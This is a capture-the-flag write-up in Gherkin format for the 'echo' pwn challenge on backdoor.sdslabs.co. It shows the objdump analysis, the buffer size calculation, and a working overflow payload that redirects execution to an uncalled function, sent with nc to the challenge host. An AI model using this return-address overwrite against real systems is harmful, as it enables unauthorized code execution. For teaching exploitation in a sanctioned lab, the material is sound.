## Version 2.0
## language: en

Feature: echo - Pwn-able - backdoor
  Site:
    https://backdoor.sdslabs.co/challenges/ECHO
  User:
    coldhAndss (backdoor)
  Goal:
    Get the flag to challenge

  Background:
  Hacker's software:
  | <Software name> | <Version>   |
  | Debian          | buster      |
  | objdump         | 2.28        |
  | python          | 2.7.13      |
  | nc              | v1.10       |
  Machine information:
    Given I have the binary file "echo" on my computer
    And objdump version 2.28
    And Python version 2.7.13
    And nc version 1.10
    And in machine is running on Linux Debian 4.9.168

  Scenario: Success:
    Given I can execute the binary "echo"
    And I use "objdump -d echo" for disassemble the binary
    When I search in the output
    Then I found 3 interesting functions "main","test","sample"
    And their positions in memory are "08048617","080485d8","0804856b"
    When I look in "main"
    Then I can see a call to "test" in
    """
    8048628:  e8 ab ff ff ff        call   80485d8 <test>
    """
    And I can see that the function "sample" is not called at any time
    And in "test" I found
    """
    80485e1:  8d 45 c6              lea    -0x3a(%ebp),%eax
    """
    And this mean that the max buffer is "0x3a" or 58 in decimal
    When I use "python -c 'print "A"*58 '| ./echo"
    Then the output is "Segment violation"
    When instead of 58 I use 62
    Then I try using the "sample" function
    And I convert his memory address in shell code "\x6b\x85\x04\x08"
    When I use the commAnd
    """
    python -c 'print "A"*62+"\x6b\x85\x04\x08"'|nc hack.bckdr.in 12001
    """
    Then I caught the flag
